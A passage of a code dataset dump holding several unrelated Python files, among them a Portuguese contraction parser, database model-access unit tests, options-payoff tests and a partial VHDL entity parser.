AAARGH!\")\r\nif age >= 50:\r\n if age < 60:\r\n print(\"Age 50 - 59: Alright, now you KNOW you're getting old, because you can't remember what happened when you were 22!\")\r\nif age >= 60:\r\n if age < 70:\r\n print(\"Age 60 - 69: You shrink, your skin is wrinkily, and you may have already gon full silver with your hair! These are all signs of getting old!\")\r\nif age >= 70:\r\n if age < 80:\r\n print(\"Age 70 - 79: Your skin has become so precious that you need many creams, just to keep it nice and smooth. Your speed is slower, but the wise old mind is still there!\")\r\nif age >= 80:\r\n if age < 90:\r\n print(\"Age 80 - 89: Remember the good old days, when your body was like elastic? Sure you do! You'd love to have that feeling. Plus, you dont even know how to use these NEW-FANGELED-YOUNG-PEOPLE-GADGETS!\")\r\n wait.sleep(1)\r\n print(\"(Also, why need to take away my driver's liscense!?!?!?!?!?!)\")\r\nif age >= 90:\r\n if age <= 100:\r\n print(\"Age 90 - 100: Congrats to you for making it this far. Really, props to you.\")\r\n\r\nwait.sleep(4)\r\n\r\nprint(\"If you enjoyed, stay tuned, as cycoo4 will release a new update soon! You can DM him on Discord at cycoo4#4444. Plus, he posts videos here!: https://www.youtube.com/channel/UC59BSpVifRrk0KV2l963dag\")\r\n\r\nwait.sleep(1.5)\r\n\r\nprint(\"Ending session...\")\r\n\r\nwait.sleep(1)\r\n\r\nexit(0)","sub_path":"Age Generator V2/Python/Age_Generator_V2.py","file_name":"Age_Generator_V2.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"300590516","text":"\nimport re\n\nequation = '-6-3x-8x'\nchar = re.findall('[x]|[-|+][x]|[-|+]\\d+[x]|[-|+]\\d+',equation)\nprint(char)\n\n\nchar_2 = re.findall('[-|+]\\d+[x]',equation)\nprint(char_2)\n \ntexto = \"551 889 302 105 012 817 894 206\"\n \npatron = \"[0-9]{2}[13579]\"\n \nx = re.findall(patron, texto) #Devuelve un vector con los substrings de las ocurrencias\n \nfor i in x:\n print(i)","sub_path":"Scripts/Math/equa.py","file_name":"equa.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"487469679","text":"# -*- encoding:utf-8 -*-\n\nimport re\n\nCONTRACTIONS = {\n # Complementação de 'a'\n 'a': {\n # Contração com artigo definido\n 'a': 'à',\n 'as': 'às',\n 'aquele': 'àquele',\n 'aqueles': 'àqueles',\n 'aquela': 'àquela',\n 'aquelas': 'àquelas',\n 'aquilo': 'àquilo',\n\n # Combinação com advérbio',\n 'onde': 'aonde'},\n\n # Complementação \"de\"\n 'de': {\n 'o': 'do',\n 'os': 'dos',\n 'a': 'da',\n 'as': 'das',\n\n # Contração com pronome pessoal',\n 'ele': 'dele',\n 'eles': 'deles',\n 'ela': 'dela',\n 'elas': 'delas',\n\n # Contração com pronome demonstrativo',\n 'este': 'deste',\n 'estes': 'destes',\n 'esta': 'desta',\n 'estas': 'destas',\n 'esse': 'desse',\n 'esses': 'desses',\n 'essa': 'dessa',\n 'essas': 'dessas',\n 'aquele': 'daquele',\n 'aqueles': 'daqueles',\n 'aquela': 'daquela',\n 'aquelas': 'daquelas',\n 'isto': 'disto',\n 'isso': 'disso',\n 'aquilo': 'daquilo',\n\n # Contração com advérbio',\n 'aqui': 'daqui',\n 'aí': 'daí',\n 'ali': 'dali',\n 'acolá': 'dacolá',\n 'onde': 'donde',\n\n # Contração com pronome indefinido',\n 'outro': 'doutro',\n 'outros': 'doutros',\n 'outra': 'doutra',\n 'outras': 'doutras',\n 'outrem': 'doutrem'},\n\n # Preposição 'em'\n 'em': {\n # Contração com artigo definido',\n 'o': 'no',\n 'os': 'nos',\n 'a': 'na',\n 'as': 'nas',\n\n # Contração com artigo indefinido',\n 'um': 'num',\n 'uns': 'nuns',\n 'uma': 'numa',\n 'umas': 'numas',\n\n # Contração com pronome pessoal',\n 'ele': 'nele',\n 'eles': 'neles',\n 'ela': 'nela',\n 'elas': 'nelas',\n\n # Contração com pronome demonstrativo',\n 'o': 'no',\n 'os': 'nos',\n 'a': 'na',\n 'as': 'nas',\n 'esse': 'nesse',\n 'esses': 'nesses',\n 'essa': 'nessa',\n 'essas': 'nessas',\n 'este': 'neste',\n 'estes': 'nestes',\n 'esta': 'nesta',\n 'estas': 'nestas',\n 'aquele': 'naquele',\n 'aqueles': 'naqueles',\n 'aquela': 'naquela',\n 'aquelas': 'naquelas',\n 'isto': 'nisto',\n 'isso': 'nisso',\n 'aquilo': 'naquilo',\n\n # Contração com pronome indefinido',\n 'outro': 'noutro',\n 'outros': 'noutros',\n 'outra': 'noutra',\n 'outras': 'noutras',\n 'outrem': 'noutrem'},\n\n # Complemento de 'para'\n 'para': {\n # Contração com artigo definido ou pronome',\n 'os': 'pro',\n 'os': 'pros',\n 'a': 'pra',\n 'as': 'pras'},\n\n # Complementação \"por\"',\n 'por': {\n # Contração com artigo definido ou pronome',\n 'o': 'pelo',\n 'os': 'pelos',\n 'a': 'pela',\n 'as': 'pelas',\n\n # Entre preposições',\n 'entre': 'dentre'}\n}\n\n\ndef parse_list(file, terminals, expand=False, comp_contractions=False):\n '''\n Change the flat output format of PLAVRAS to a dictonary\n\n :param file -> file to be parsed\n :param sentence The sentence that will be processed\n :param expand If True, the entities identified by PALAVRAS are splitted\n For instance, Dilma=Rousseff is showed two words Dilma and Rousseff\n :param comp_contractions If True, the contractions from PALAVRAS are\n compressed, as de + o as showed as do\n '''\n\n # parsed_sentence = self.parse(sentence)\n # self.local_parser(sentence)\n regex = r'#(-?[0-9]+)->([0-9]+)'\n\n parsed_sentence = open(file, 'r').read()\n\n default = lambda x, y: x[0] if len(x) > 0 else y\n\n tokens = list()\n pointers = dict()\n\n flag = False\n\n if terminals[0].attributes['word'].value == 'Eu':\n flag = True\n tokens.append(('Eu', {\n 'lemma': 'eu',\n 'morpho': ['M/F', '1S', 'NOM'],\n 'POS': 'pron-pers',\n 'semantic': ['eu'],\n 'relation': '#-1->1'}))\n\n for line in parsed_sentence.split('\\n'):\n\n if len(line.strip()) > 0:\n\n relation = default(re.findall('#\\d+->\\d+', line), '')\n\n original_word = re.findall('[^\\t ]+', line)[0]\n original_word = [original_word]\n\n if expand and original_word[0] != '=':\n original_word = original_word[0].split('=')\n\n for word in original_word:\n if word.startswith('$'):\n word = word[1:]\n lemma = word\n morpho = ['punct']\n pos = 'punct'\n word = word.replace('=', ' ')\n semantic_info = ['']\n\n else:\n lemma = default(\n re.findall('(?<=\\[)[^\\]]+', line), word)\n\n # Morpho Syntactic information\n morpho = default(re.findall(\n '[^>\\[\\]]+@', line), '', ).strip().split()\n if len(morpho) > 0:\n morpho.pop(-1)\n\n # The word id is its position in sentence\n pos = default(re.findall('(?<=@)[^ ]+', line), '')\n\n semantic_info = re.findall('(?<=<)[^> ]+', line)\n\n if len(tokens) > 0:\n contraction = CONTRACTIONS.get(\n tokens[-1][0], {}).get(word, None)\n\n if not (contraction is None):\n tokens[-1][1]['lemma'] = contraction\n tokens[-1] = (contraction, tokens[-1][1])\n word = None\n\n try:\n if morpho[2] == '1S' and not flag:\n target = re.search(regex, relation).group(1)\n tokens.append(('eu', {\n 'lemma': 'eu',\n 'morpho': ['M/F', '1S', 'NOM'],\n 'POS': 'pron-pers',\n 'semantic': ['eu'],\n 'relation': '#-2->' + target}))\n except IndexError:\n pass\n flag = False\n if not (word is None):\n tokens.append((word, {\n 'lemma': lemma,\n 'morpho': morpho,\n 'POS': pos,\n 'semantic': semantic_info,\n 'relation': relation, }))\n\n index = relation.replace('#', '').split('->')[0]\n pointers[index] = len(tokens) - 1\n\n return tokens, pointers","sub_path":"palavras.py","file_name":"palavras.py","file_ext":"py","file_size_in_byte":6755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"80311746","text":"from tools import timed\nimport codecs\n\nfrom graph import Node, Edge\nfrom mongo_dal import MongoDAL\n\nMAX_DEPTH = 3\n\nclass GraphWriter(object):\n def __init__(self, max_depth=MAX_DEPTH):\n self.max_depth = max_depth\n self.dal = MongoDAL()\n self.nodes_dict = self.dal.get_nodes_dictionary()\n self.titles_blacklist = ['List of ']\n\n @timed\n def generate_graph_files(self, topic):\n src_id = self.nodes_dict[topic]\n \n self.nodes_file = codecs.open('nodes.csv', 'w', encoding='UTF-8')\n self.edges_file = codecs.open('edges.csv', 'w', encoding='UTF-8')\n\n self.edges_file.write(\"Source,Target,Weight\\n\")\n self.nodes_file.write(\"Id, Label\\n\")\n\n self.recurse_write_node(topic)\n\n self.nodes_file.close()\n self.edges_file.close()\n\n def recurse_write_node(self, topic, depth=0):\n if depth >= self.max_depth:\n return\n\n node = self.dal.get_node(topic)\n self.nodes_file.write('%s, \"%s\"\\n' % (node['page_id'], node['title']))\n\n for link in node['links']:\n if not self.nodes_dict.has_key(link):\n continue\n if link in self.titles_blacklist:\n continue\n dest_id = self.nodes_dict[link]\n weight = self.get_edge_weight(node, link)\n edge = Edge(node['page_id'], dest_id, weight)\n self.edges_file.write(str(edge))\n\n self.recurse_write_node(link, depth+1)\n\n def get_edge_weight(self, node, link):\n # Count number of occurrences of link title in node body\n return 1 + node['content'].lower().count(link.lower())\n\n","sub_path":"graph_utils.py","file_name":"graph_utils.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"287511322","text":"def printProgressBar(iteration,total,prefix='',suffix='',decimals = 1, length = 100,fill='█'):\n '''\n @params:\n iter - R - current iteration\n total - R - total iterations\n prefix - O - prefix string\n suffix - O - suffix string\n decimals- O - positive number of dec in percent complete\n length - O - character length of bar\n fill - O - bar fill character\n '''\n \n percent = 0\n filledLength = 0\n try:\n percent = (\"{0:.\"+str(decimals) + \"f}\").format(100 * (iteration/float(total)))\n filledLength = int(length * iteration // total)\n except ZeroDivisionError:\n print()\n #return\n bar = fill * filledLength + '-' * (length - filledLength)\n print('\\r%s |%s| %s%% %s'%(prefix,bar,percent,suffix), end = '\\r')\n\n if iteration == total:\n print()","sub_path":"displayutils.py","file_name":"displayutils.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"179866482","text":"import unittest\nfrom threading import Thread\nfrom time import sleep\n\nfrom bidon.db.access import ModelAccess, RollbackTransaction, Upsert, autocommit, transaction\nfrom bidon.db.model import ModelBase\n\nfrom tests import get_model_access\n\n\n__all__ = [\"DbAccessModelAccessTestCase\"]\n\n\nclass Person(ModelBase):\n table_name = \"people\"\n attrs = {\n \"first_name\": None,\n \"last_name\": None,\n \"age\": 0 }\n\n\nclass PersonThing(ModelBase):\n table_name = \"peoples_things\"\n primary_key_name = (\"person_id\", \"thing_id\")\n primary_key_is_auto = False\n attrs = {\n \"person_id\": None,\n \"thing_id\": None,\n \"quantity\": 0}\n\n\nclass Thing(ModelBase):\n table_name = \"things\"\n attrs = {\n \"name\": None,\n \"type\": None,\n \"other\": None }\n\n\nclass DbAccessModelAccessTestCase(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.mab = get_model_access()\n cls.mab.open()\n\n @classmethod\n def tearDownClass(cls):\n cls.mab.rollback()\n cls.mab.close()\n\n def test_find_model(self):\n p = self.mab.find_model(Person, dict(first_name=\"Yours\"))\n self.assertIsNotNone(p)\n self.assertIsInstance(p, Person)\n self.assertEqual(p.first_name, \"Yours\")\n\n def test_find_models(self):\n ps = list(self.mab.find_models(Person, \"last_name like 'T%'\"))\n self.assertEqual(len(ps), 2)\n self.assertIsInstance(ps[0], Person)\n self.assertEqual(ps[0].last_name[0], \"T\")\n\n def test_page_models(self):\n ps, count = self.mab.page_models(Person, (0, 4), order_by=\"id\")\n self.assertEqual(count, 11)\n self.assertEqual(len(ps), 4)\n self.assertEqual([1, 2, 3, 4], [p.id for p in ps])\n\n def test_find_model_by_id(self):\n pt = self.mab.find_model_by_id(PersonThing, [1, 1])\n self.assertEqual(pt.person_id, 1)\n self.assertEqual(pt.thing_id, 1)\n self.assertEqual(pt.quantity, 1)\n p = self.mab.find_model_by_id(Person, 1)\n\n def test_refresh_model(self):\n with get_model_access() as mab:\n pt = mab.find_model(Person, \"1=1\")\n nn = \"aabbccdd\"\n mab.update(Person.table_name, dict(first_name=nn), dict(id=pt.id))\n self.assertNotEqual(pt.first_name, nn)\n self.assertEqual(mab.refresh_model(pt, overwrite=False).first_name, nn)\n self.assertNotEqual(pt.first_name, nn)\n mab.refresh_model(pt, overwrite=True)\n self.assertEqual(pt.first_name, nn)\n mab.rollback()\n\n def test_update_model(self):\n with get_model_access() as mab:\n p1 = mab.find_model_by_id(Person, 1)\n ua = p1.updated_at\n self.assertNotEqual(p1.first_name, \"Minerva\")\n updatedattrs = p1.update(dict(first_name=\"Minerva\", last_name=\"McGonagall\"))\n mab.update_model(p1, include_keys=updatedattrs)\n if mab.core.supports_returning_syntax:\n self.assertNotEqual(ua, p1.updated_at)\n p2 = mab.find_model_by_id(Person, 1)\n self.assertEqual(p2.first_name, \"Minerva\")\n self.assertEqual(p2.last_name, \"McGonagall\")\n mab.rollback()\n\n def test_insert_model(self):\n with get_model_access() as mab:\n p1 = Person(dict(first_name=\"Albus\", last_name=\"Dumbledore\", age=115))\n self.assertIsNone(p1.id)\n mab.insert_model(p1)\n self.assertIsNotNone(p1.id)\n self.assertIsNotNone(p1.created_at)\n p2 = mab.find_model_by_id(Person, p1.id)\n self.assertEqual(p1.first_name, p2.first_name)\n self.assertEqual(p1.last_name, p2.last_name)\n self.assertEqual(p1.age, p2.age)\n\n tparams = dict(name=\"Treyfus Cucuss\", type=\"person\")\n t1 = Thing(tparams)\n t2 = Thing(tparams)\n\n # Insert a thing to run upserts against\n self.assertIsNone(t1.id)\n mab.insert_model(t1)\n self.assertIsNotNone(t1.id)\n\n # Make sure that t2 has no id\n self.assertIsNone(t2.id)\n\n # Upsert it, but don't force the update, which should result in no ID being assigned.\n mab.insert_model(t2, upsert=Upsert(Upsert.DO_UPDATE, (\"name\", ), False))\n self.assertIsNone(t2.id)\n\n # Upsert it, but force the update, so the result should now have an ID, and it should be the\n # same ID as the first.\n mab.insert_model(t2, upsert=Upsert(Upsert.DO_UPDATE, (\"name\", ), True))\n self.assertIsNotNone(t2.id)\n self.assertEqual(t1.id, t2.id)\n\n mab.rollback()\n\n def test_delete_model(self):\n with get_model_access() as mab:\n pc = mab.count(\"people\")\n mab.delete_model(Person(id=11))\n self.assertEqual(pc - 1, mab.count(\"people\"))\n self.assertIsNone(mab.find_model_by_id(Person, 11))\n\n ptc = mab.count(\"peoples_things\")\n mab.delete_model(PersonThing(person_id=1, thing_id=1))\n self.assertEqual(ptc - 1, mab.count(\"peoples_things\"))\n self.assertIsNone(mab.find_model_by_id(PersonThing, [1, 1]))\n\n mab.delete_model(PersonThing, [1, 2])\n self.assertEqual(ptc - 2, mab.count(\"peoples_things\"))\n self.assertIsNone(mab.find_model_by_id(PersonThing, [1, 1]))\n\n mab.rollback()\n\n def test_find_or_upsert(self):\n class UpsertTest(ModelBase):\n table_name = \"upserts\"\n attrs = { \"name\": None, \"type\": None }\n\n def insert(ma, name, type):\n return ma.insert_model(UpsertTest(name=name, type=type))\n\n def upsert(ma, name, type, assign):\n with transaction(ma):\n assign.append(ma.find_or_upsert(UpsertTest, dict(name=name, type=type), comp=dict(name=name), return_status=True))\n\n with get_model_access() as ma1, get_model_access() as ma2:\n with autocommit(ma1):\n ma1.execute(\"drop table if exists upserts\")\n ma1.execute(\"create table upserts (id serial not null primary key, name text not null unique, type text not null, created_at timestamptz not null default now(), updated_at timestamptz not null default now());\")\n ma1.execute(\"truncate table upserts\")\n\n # 1) Two transactions: a) create b) upsert a) commit - check that a and b have same id\n # 2) Two transactions: a) create b) upsert a) rollback - check that a and b have differnet ids\n\n with transaction(ma1):\n mod1 = insert(ma1, \"Trey\", \"person\")\n mod2a = []\n thread1 = Thread(target=lambda: upsert(ma2, \"Trey\", \"person\", mod2a))\n thread1.start()\n sleep(0.25)\n self.assertTrue(thread1.is_alive())\n thread1.join()\n mod2, mod2_status = mod2a[0]\n self.assertEqual(mod2_status, \"duplicate\")\n self.assertEqual(mod1.id, mod2.id)\n\n with transaction(ma1):\n mod3 = insert(ma1, \"Julie\", \"person\")\n mod4a = []\n thread2 = Thread(target=lambda: upsert(ma2, \"Julie\", \"person\", mod4a))\n thread2.start()\n sleep(0.25)\n self.assertTrue(thread2.is_alive())\n raise RollbackTransaction()\n thread2.join()\n mod4, mod4_status = mod4a[0]\n self.assertEqual(mod4_status, \"created\")\n self.assertNotEqual(mod3.id, mod4.id)\n\n mod5a = []\n upsert(ma1, \"Trey\", \"person\", mod5a)\n mod5, mod5_status = mod5a[0]\n self.assertEqual(mod5_status, \"found\")\n self.assertEqual(mod5.id, mod1.id)\n","sub_path":"tests/db/access/test_model_access.py","file_name":"test_model_access.py","file_ext":"py","file_size_in_byte":6949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"2890099","text":"#!/usr/bin/env python \n\n\n# Copyright 2021 Gregory Ditzler \n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of this \n# software and associated documentation files (the \"Software\"), to deal in the Software \n# without restriction, including without limitation the rights to use, copy, modify, \n# merge, publish, distribute, sublicense, and/or sell copies of the Software, and to \n# permit persons to whom the Software is furnished to do so, subject to the following \n# conditions:\n#\n# The above copyright notice and this permission notice shall be included in all copies \n# or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, \n# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR \n# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE \n# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT \n# OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR \n# OTHER DEALINGS IN THE SOFTWARE.\n\n\ndef jaccard(a, b):\n \"\"\"\n Jaccard index\n \"\"\"\n a, b = set(a), set(b)\n return 1.*len(a.intersection(b))/len(a.union(b))\n\ndef kuncheva(a, b, K): \n \"\"\"\n Kuncheva index \n \"\"\"\n a, b = set(a), set(b)\n r = 1.*len(a.intersection(b))\n k = 1.*len(a)\n return 1.*(r*K - k**2)/(k*(K - k)) \n\n\ndef total_consistency(sel_feats, n_features): \n \"\"\"\n Measure the Jaccard and Kuncheva stability for sets of feature subsets that\n were collected from cross fold validation. \n \"\"\"\n n = len(sel_feats)\n\n ck, cj = 0., 0.\n k = 0\n for i in range(n): \n for j in range(n): \n if j > i: \n cj += jaccard(sel_feats[i], sel_feats[j])\n ck += kuncheva(sel_feats[i], sel_feats[j], n_features)\n k += 1\n return cj/k, ck/k ","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"387112210","text":"import options\nimport numpy as np\n\ndef equal(a, b, p=10):\n \"\"\"\n Checks that the two arrays are equal to a very small degree of precision.\n \"\"\"\n truths = np.abs(a - b) < 10**(-p)\n\n if type(truths) is np.ndarray:\n return np.mean(truths) == 1\n else:\n return truths\n\n\ndef test_value():\n\n val = options.payoff_contract(\n contract={\"type\":\"call\", \"position\":\"buy\", \"strike\":1.0, \"premium\":0.045, \"expiration\":45},\n price = 10000.0)\n\ndef test_vertical_put_credit_spread():\n\n contracts = [\n {\"type\":\"put\", \"position\":\"sell\", \"strike\":1.1, \"premium\":0.045, \"expiration\":45},\n {\"type\":\"put\", \"position\":\"buy\", \"strike\":1.0, \"premium\":0.035, \"expiration\":45}\n ]\n premium = 0.045 - 0.035 # This is how much premium we earned\n\n # Test the payoff diagram\n prices, pay = options.payoff(contracts)\n exppay = np.array([premium + 1.0 - 1.1, premium + 1.0 - 1.1, premium, premium])\n assert equal(pay, exppay)\n\n # Test the max loss\n max_loss = options.maxloss(contracts)\n assert equal(max_loss, 1.0 - 1.1 + premium)\n\n # Test the expected value\n val = options.value(contracts, 1.2, 0.5)\n val2 = options.vertical_put_credit_spread(1.2, 0.5, 45, 1.0, 0.035, 1.1, 0.045)\n assert np.abs(val*100 - val2[0]) < 10**(-10)\n\n # Test the annualised rate of return\n assert equal(val2[1], options.annret(val, max_loss, 45))\n\ndef test_payoff_vertical_call_credit_spread():\n\n contracts = [\n {\"type\":\"call\", \"position\":\"sell\", \"strike\":1.0, \"premium\":0.045, \"expiration\":45},\n {\"type\":\"call\", \"position\":\"buy\", \"strike\":1.1, \"premium\":0.035, \"expiration\":45}\n ]\n premium = 0.045 - 0.035 # This is how much premium we earned\n\n # Test the payoff diagram\n prices, pay = options.payoff(contracts)\n exppay = np.array([premium, premium, premium + 1.0 - 1.1, premium + 1.0 - 1.1])\n assert equal(pay, exppay)\n\n # Test the max loss\n max_loss = options.maxloss(contracts)\n assert equal(max_loss, 1.0 - 1.1 + premium)\n\n # Test the expected value\n val = options.value(contracts, 1.2, 0.5)\n val2 = options.vertical_call_credit_spread(1.2, 0.5, 45, 1.0, 0.045, 1.1, 0.035)\n assert np.abs(val*100 - val2[0]) < 10**(-9)\n\n\ndef test_selling_iron_condor():\n\n contracts = [\n {\"type\":\"put\", \"position\":\"buy\", \"strike\":84.5, \"premium\":0.46, \"expiration\":14},\n {\"type\":\"put\", \"position\":\"sell\", \"strike\":85, \"premium\":0.535, \"expiration\":14},\n {\"type\":\"call\", \"position\":\"sell\", \"strike\":90, \"premium\":0.635, \"expiration\":14},\n {\"type\":\"call\", \"position\":\"buy\", \"strike\":90.5, \"premium\":0.4, \"expiration\":14},\n ]\n\n premium = options.cost(contracts) # This is how much premium we earned\n\n # Test the amount earned\n assert premium == -0.46 + 0.535 + 0.635 - 0.4\n assert equal(premium, 0.31) # Value given by dough.com\n\n # Test the payoff diagram\n prices, pay = options.payoff(contracts)\n expprices = np.array([0, 84.5, 85, 90, 90.5])\n exppay = np.array([-0.5, -0.5, 0, 0, -0.5, -0.5]) + premium\n assert equal(pay, exppay, 8)\n assert equal(prices[:-1], expprices)\n\n # Test the max loss\n max_loss = options.maxloss(contracts)\n assert equal(max_loss, premium - 0.5, 8)\n\n # Build the distribution\n # In dough, volatility is taken from the table view of the trading window\n # I'm using the IV from the expiration month in the top right corner of\n # the table.\n dist = options.Lognormal.from_IV(88.06, 0.203, 14)\n\n # Test the probability in/out of the money\n assert np.round(options.prob_itm(contracts[0], dist), 2) == 0.15\n assert np.round(options.prob_itm(contracts[1], dist), 2) == 0.19\n assert np.round(options.prob_itm(contracts[2], dist), 2) == 0.29\n assert np.round(options.prob_itm(contracts[3], dist), 2) == 0.25 # dough.com said 0.24\n assert np.round(options.prob_otm(contracts[0], dist), 2) == 0.85\n assert np.round(options.prob_otm(contracts[1], dist), 2) == 0.81\n assert np.round(options.prob_otm(contracts[2], dist), 2) == 0.71\n assert np.round(options.prob_otm(contracts[3], dist), 2) == 0.75 # dough.com said 0.76\n\n # Test profitable ranges\n ranges = options.profitable_ranges(contracts)\n assert len(ranges) == 3\n assert ranges[0][0] == 85-0.31\n assert ranges[0][1] == 85\n assert ranges[1][0] == 85\n assert ranges[1][1] == 90\n assert ranges[2][0] == 90\n assert ranges[2][1] == 90 + 0.31\n\n # Test probability of profit\n # Dough.com says it should be 0.58. But they do change this to meaning make\n # at least one penny. I'm assuming continuous price here.\n prob_profit = options.prob_profit(contracts, dist)\n assert np.round(prob_profit, 2) == 0.57\n\n # Test the expected value\n val = options.value(contracts, 88.06, 0.203)\n assert equal(val, 0.0917671259072)\n\n # # Test the annualised rate of return\n # assert equal(val2[1], options.annret(val, max_loss, 45))\n","sub_path":"tests/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"202034210","text":"'''\nQuestion 2\n===========\n\nThere are few important things to consider while solving this question:\n\n1. Since the server log file is large , one must not attempt to load\nthe entire file into memory. If an attempt to load the entire file is made,\nthe system shall crash.\n\nMethod to overcome 1:\n---------------------\nRead the file line by line.\nThat is, just read and process only 1 line at a time.\n\n\n2. The file should be loaded to a filesystem or database in a performant way.\nThe final goal of the server log processing is to gather insights at the end\nof the pipeline.\n\nMethod to accomplish 2:\n------------------------\nAfter reading and parsing , we store the data in Amazon Elastic search.\nWe can choose Elastic search as its very fast\nin searching among millions of records because of its lucene based indexing.\n\nAnother advantage of using it is having \"drill-down\" property which can be very\nhandy for even non-engineers to analyse the data stored.\nApart from that, it has inbuit support for kibana dashboard which might help\nin creating good visualization for the events occuring.\n\nSo, we can create an Elastic search \"index\" say \"server_logs\".\nThis index can contain \"types\" where each type corresponds to the \"event-type\" in\nour log.\n\nAnalogy of relational database and elastic search is as follows:\n\n\n MySQL => Databases => Tables => Columns/Rows\n Elasticsearch => Indices => Types => Documents with Properties\n\n3. Build in checks for reducing job errors:\n\nSince we are using Elastic search , it becomes easier to acheive this.\nSince each event-type correspornds to a particular 'type' in elastic search,\nthere is no question of creating a new 'type' for a previously recorded event-type,\nthe elastic search itself shall block it.\nAlso, while a creating a new 'type' in elastic search, we get the freedom of\ndefining the \"properties of Document\" as each document or record shall reside\nin the \"type\".\n\nSo, even if 1 record has some irrelvant data or erroneous data, that will not\nbe part of the documents present in a \"type\"\n\n\nPsedocode:\n\n'''\nElasticsearch_index = 'server_logs'\n\ndef read_parse_file(filename):\n with open(filename, 'r') as filehandle:\n while(True):\n line = filehandle.readLine()\n if not line:\n break\n else:\n list_of_values = line.split(\",\")\n event = list_of_values[2]\n store_into_elastic_search(Elasticsearch_index, event, list_of_values)\n\ndef store_into_elastic_search(Elasticsearch_index, event, list_of_values):\n if check_event_type_exists_in_index(Elasticsearch_index, event):\n put_record_to_elastic_search(Elasticsearch_index, event, list_of_values)\n else:\n if create_new_type(Elasticsearch_index, event):\n put_record_to_elastic_search(Elasticsearch_index, event, list_of_values)\n\n\ndef check_event_type_exists_in_index(Elasticsearch_index, event):\n if type_exists(Elasticsearch_index, event):\n return True\n else:\n return False\n\ndef create_new_type(Elasticsearch_index, type):\n properties = read_config_properties(Elasticsearch_index, type)\n if create_new_type_inbuilt_function(properties, Elasticsearch_index, type):\n return True\n else:\n return False\n\n\ndef put_record_to_elastic_search(Elasticsearch_index, event, list_of_values):\n put_record_to_elastic_search_inbuilt_function(Elasticsearch_index, event, list_of_values)\n return\n","sub_path":"question2.py","file_name":"question2.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"548682406","text":"import collections\nimport logging\n\nfrom slvcodec import package, typ_parser, symbolic_math, typs\nfrom slvcodec.typs import ResolutionError\n\n\nlogger = logging.getLogger(__name__)\n\nCLOCK_NAMES = ('clk', 'clock')\n\n\ndef process_files(filenames, must_resolve=True):\n '''\n Takes a list of filenames,\n parses them with the VUnit parser\n and then processes them in slvcodec classes.\n\n The packages references to one another are resolved as\n are the references to types and constants in the entity\n interfaces.\n '''\n entities = {}\n packages = []\n for filename in filenames:\n parsed = package.parsed_from_filename(filename)\n if parsed.entities:\n assert(len(parsed.entities) == 1)\n p = process_parsed_entity(parsed)\n entities[p.identifier] = p\n assert(not parsed.packages)\n if parsed.packages:\n pkg = package.process_parsed_package(parsed)\n packages.append(pkg)\n resolved_packages = package.resolve_packages(packages)\n resolved_entities = dict([(e.identifier, e.resolve(resolved_packages, must_resolve=must_resolve))\n for e in entities.values()])\n return resolved_entities, resolved_packages\n\n\ndef process_parsed_entity(parsed_entity):\n '''\n Processes the parse entity (output from VUnit vhdl_parser)\n into an UnresolvedEntity class.\n '''\n p_generics = parsed_entity.entities[0].generics\n generics = [typs.Generic(\n name=g.identifier,\n typ=typ_parser.process_subtype_indication(g.subtype_indication),\n ) for g in p_generics]\n p_ports = parsed_entity.entities[0].ports\n ports = [Port(\n name=p.identifier,\n direction=p.mode,\n typ=typ_parser.process_subtype_indication(p.subtype_indication),\n ) for p in p_ports]\n gd = dict([(g.name, g) for g in generics])\n pd = collections.OrderedDict([(p.name, p) for p in ports])\n uses = package.get_parsed_package_dependencies(parsed_entity)\n p = UnresolvedEntity(\n identifier=parsed_entity.entities[0].identifier,\n generics=gd,\n ports=pd,\n uses=uses,\n )\n return p\n\n\nclass Port:\n\n def __init__(self, name, direction, typ):\n self.name = name\n self.direction = direction\n self.typ = typ\n\n\nclass UnresolvedEntity:\n '''\n Keeps track of the generics, ports and package dependencies of\n an entity.\n '''\n\n def __init__(self, identifier, generics, ports, uses):\n self.identifier = identifier\n self.generics = generics\n self.ports = ports\n self.uses = uses\n\n def resolve(self, packages, must_resolve=True):\n resolved_uses = package.resolve_uses(self.uses, packages, must_resolve=must_resolve)\n available_types, available_constants = package.combine_packages(\n [u.package for u in resolved_uses.values()])\n available_constants = package.exclusive_dict_merge(\n available_constants, self.generics)\n resolved_ports = collections.OrderedDict()\n for name, port in self.ports.items():\n try:\n if port.typ in available_types:\n resolved_typ = available_types[port.typ]\n elif isinstance(port.typ, str):\n raise Exception('Cannot resolve port typ {}'.format(port.typ))\n else:\n resolved_typ = port.typ.resolve(available_types, available_constants)\n resolved_port = Port(name=port.name, direction=port.direction,\n typ=resolved_typ)\n resolved_ports[name] = resolved_port\n except ResolutionError as e:\n # If we can't resolve and `must_resolve` isn't True then we just\n # skip ports that we can't resolve.\n if 